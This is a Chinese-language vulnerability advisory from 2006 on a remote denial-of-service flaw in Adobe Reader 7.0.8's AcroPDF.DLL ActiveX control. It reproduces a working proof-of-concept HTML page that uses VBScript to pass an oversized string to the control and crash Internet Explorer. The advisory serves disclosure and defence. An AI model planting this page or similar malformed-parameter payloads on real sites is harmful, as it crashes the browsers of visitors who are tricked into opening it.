Adobe Reader AcroPDF.DLL ActiveX控件远程拒绝服务漏洞
发布日期:2006-12-29
更新日期:2006-12-30
受影响系统:Adobe Acrobat Reader 7.0.8
描述:
BUGTRAQ ID:
21813
Adobe Reader是非常流行的PDF文件阅读器。
IE浏览器在以畸形的参数调用Adobe Reader的AcroPDF.DLL ActiveX控件时存在漏洞,远程攻击者可能利用此漏洞导致浏览器崩溃。
如果用户受骗打开了恶意的WEB页面的话,就会触发这个漏洞,导致浏览器崩溃。
<*来源:shinnai (
shinnai@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
---------------------------------------------------------------------------------
Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site:
http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Dear Dave'n Greg, try to be much correct next time, right? (they'll understand ;)
---------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='AcroPDF'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2097512, "A")
AcroPDF.src=arg1
</script>
建议:
厂商补丁:
Adobe
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.adobe.com浏览次数:3587
严重程度:0(网友投票)
